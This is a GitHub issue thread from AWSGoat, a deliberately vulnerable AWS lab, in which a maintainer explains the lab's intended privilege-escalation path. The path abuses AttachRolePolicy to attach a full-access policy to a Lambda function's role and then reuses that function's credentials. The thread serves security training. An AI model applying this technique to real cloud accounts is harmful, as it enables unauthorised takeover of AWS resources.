ine-labs / AWSGoat

AWSGoat : A Damn Vulnerable AWS Infrastructure
MIT License
1.72k stars 1.08k forks source link

Misconfigured dev-ec2-lambda-policies #39

Closed aj2rivastava closed 10 months ago

aj2rivastava commented 1 year ago

While performing the AWS Goat Lab, I realized that the initial access provided the AWS session for blog-application-data role. But when I tried to perform the privilege escalation, then I realized that the dev-ec2-lambda-policies is misconfigured to allow AttachRolePolicy to the blog_app_lambda role instead of blog-application-data role. Is it expected or am I missing anything?

s0ulix commented 10 months ago

Hey @aj2rivastava, initial access is provided from the blog-application-data function's aws credentials. This function assumes the blog_app_lambda_data role. Then in the privilege escalation step we use the dev-ec2-lambda-policies which has permission over the role blog_app_lambda_data to attach policy on it, not the blog_app_lamda role. Here we create a new policy to allow full access on all the resource and attach to blog_app_lambda_data role which will be assumed by the blog-application-data function. So when we use the new credentials from the blog-applicaiton-data function we will have the full access.

We have tried it on our end and it works as expected. You can follow the steps from solution manuals to get the privilege escalation.